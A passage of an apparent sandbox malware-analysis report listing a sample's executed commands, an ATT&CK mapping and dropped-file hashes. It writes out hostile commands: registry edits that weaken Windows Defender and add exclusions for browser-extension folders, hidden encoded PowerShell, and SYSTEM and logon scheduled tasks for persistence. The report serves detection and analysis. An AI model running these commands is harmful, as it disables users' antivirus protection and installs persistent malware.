C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5052
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:4248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:323⤵PID:1616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:324⤵PID:4204
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:643⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:323⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:643⤵PID:3948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:323⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:643⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:323⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:643⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:323⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:643⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:323⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:323⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:643⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:323⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:643⤵PID:2916
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggNYBrcgo" /SC once /ST 17:15:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggNYBrcgo"2⤵PID:5052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggNYBrcgo"2⤵PID:1068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uaXipkbyxrnNFDdtl" /SC once /ST 13:32:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\VFQPnVd.exe\" ix /gWsite_idvoP 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:3988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uaXipkbyxrnNFDdtl"2⤵PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:3748
-
C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\VFQPnVd.exeC:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\VFQPnVd.exe ix /gWsite_idvoP 385118 /S1⤵PID:1848
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bFvsKFifcttmubYYTU"2⤵PID:4680
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4188
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3584
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2632
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PxtQEfdrU\ofVHUD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PhOAIbnrVHbfAsF" /V1 /F2⤵
- Creates scheduled task(s)
PID:4648
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5186cbabad877e1464741b0b4afe5a7ea
SHA13ab459c4c76de42dbb5ac24dd488bb70fc54ae44
SHA256d13999331d5dc2befd38fec0a9c0d147beab9260197fa10ee6d6aacffc8e9b8b
SHA512729d33d180f11d4931119a6bc091853cf2cb0b5e7e0c8fc140753fa1ee280ab747a1509d392aac6f7083b8c2403b40190d0f0db5c76052df9847981cbf019ad7
-
Filesize
2.8MB
MD5c1d501f33ce15736f24660caf68081b7
SHA1467b0f9549e59d86a9a5e5715ab210b4889fcdb5
SHA25688520725b0a50fe8cd4da0e78de877c27d81e01c09e8ef28df7848a2ab46d509
SHA512128bdd9310b1288995f4dca4624c9e4d077919773da7f86f40346b88ebf1ab3e652979544832df814169a926ca4e6ad7548c24a03fd2a5c84224bbd473dcd51f
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA51217977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA51217977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
Filesize1.9MB
MD5b0f128c3579e6921cfff620179fb9864
SHA160e19c987a96182206994ffd509d2849fdb427e3
SHA2561c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA51217977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe
Filesize2.1MB
MD534afbc4605531efdbe6f6ce57f567c0a
SHA16cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA2560441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\assistant_installer.exe
Filesize2.1MB
MD534afbc4605531efdbe6f6ce57f567c0a
SHA16cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA2560441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbgcore.DLL
Filesize166KB
MD55a6cd2117967ec78e7195b6ee10fc4da
SHA172d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA51207aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbgcore.dll
Filesize166KB
MD55a6cd2117967ec78e7195b6ee10fc4da
SHA172d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA51207aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbgcore.dll
Filesize166KB
MD55a6cd2117967ec78e7195b6ee10fc4da
SHA172d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA51207aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbghelp.dll
Filesize1.7MB
MD5861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA2567878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbghelp.dll
Filesize1.7MB
MD5861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA2567878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\assistant\dbghelp.dll
Filesize1.7MB
MD5861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA2567878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311192150001\opera_package
Filesize103.2MB
MD5be5e4506abd821bcf03061f2fda2f0f6
SHA16f9683dbe26bede970c29badb3e678514864361f
SHA256e1583c2dfbe506b9d041b9d6f605ce831d0757b7e2c1c3dc22271ae78b7d78dd
SHA512182f847a3336baa0ac2f1489f79aba4c5ee8df43ba50581c2a8a27d5ad39a3b413714f5fa7d95923e73e95542cc40550e96dd98e04d1c63619760f181d36932e
-
Filesize
6.0MB
MD570bc03082092a2c53e2770696a7e9f7c
SHA15cb5e306464023f61bd7a982e001eb02917d3be1
SHA2561712b6a8dfbbb30a60476fa39f781ba23a188872674c596cf5a95d7a01246ff6
SHA5128ea36407d5fd4de8bea85736edc0d116ee4beccdcd27d8c0858cfa332d22a0f2357dbb0a0ce3dcd45f01b7d668c3bc0d842742fdedb671c3113d3497e4399d8c
-
Filesize
6.0MB
MD570bc03082092a2c53e2770696a7e9f7c
SHA15cb5e306464023f61bd7a982e001eb02917d3be1
SHA2561712b6a8dfbbb30a60476fa39f781ba23a188872674c596cf5a95d7a01246ff6
SHA5128ea36407d5fd4de8bea85736edc0d116ee4beccdcd27d8c0858cfa332d22a0f2357dbb0a0ce3dcd45f01b7d668c3bc0d842742fdedb671c3113d3497e4399d8c
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
5.3MB
MD500e93456aa5bcf9f60f84b0c0760a212
SHA16096890893116e75bd46fea0b8c3921ceb33f57d
SHA256ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca
-
Filesize
4.6MB
MD5161c755621aa80426d48315d27bc8daa
SHA1c17fed1e315395b38474842d3353663066b250c5
SHA2566a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
